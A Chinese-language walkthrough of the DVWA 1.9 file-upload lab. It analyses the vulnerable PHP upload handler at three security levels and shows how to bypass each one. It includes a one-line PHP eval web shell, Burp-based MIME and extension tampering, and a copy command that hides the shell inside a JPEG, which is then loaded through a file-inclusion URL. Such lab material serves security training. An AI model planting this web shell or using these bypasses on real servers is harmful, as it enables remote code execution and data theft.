测试平台使用的DVWA 1.9 版本 +phpStudy环境测试
1.low级别
源码分析:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
?>
这个级别中没有过滤函数,上传一句话木马文件<?php @eval($_POST["pass"]);?> php文件,使用菜刀连接即可获取数据库信息,在连接的过程中要注意使用burp进行抓包,在中国菜刀上连接dvwa时默认的cookie是impossible模式,使用burp拦截请求后在请求头信息中添加cookie信息:Cookie: security=low; PHPSESSID=n693sr05jbtn03nh63ageq57j1 后可解决连接失败的问题。
2.medium级别
源码分析:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
这个级别只对文件名进行过滤,上传漏洞构建的思路是,先把php一句话木马保存成png的模式,在点击上传之前使用burpsuit拦截包,然后在burp中修改文件后缀名为php文件,即可成功上传。最后使用菜刀连接即可。
3.high级别
源码分析:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
//返回文件名
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
//返回后缀名
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>
函数解析:
• stripos() - 查找字符串在另一字符串中第一次出现的位置(不区分大小写)
• strpos() - 查找字符串在另一字符串中第一次出现的位置(区分大小写)
• strripos() - 查找字符串在另一字符串中最后一次出现的位置(不区分大小写)
• strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。(区分大小写)
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。
在真实的环境下测试函数:
$checkImage=getimagesize($fileTmpName);
var_dump($checkImage);
输出结果:
array (size=7)
0 => int 1024
1 => int 583
2 => int 2
3 => string 'width="1024" height="583"' (length=25)
'bits' => int 8
'channels' => int 3
'mime' => string 'image/jpeg' (length=10)
经过上面的分析,我们在一张真正的图片后添加一段一句话木马,在cmd框中执行下面命令:
copy 11.jpg/b+11.php/a 123.jpg
把生成的图片上传到服务器,然后使用菜刀连接,直接连接的话是不能识别图片木马的,在这里使用下面路径连接:
http://192.168.15.201/DVWA-1.9/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\DVWA-1.9\hackable\uploads\123.jpg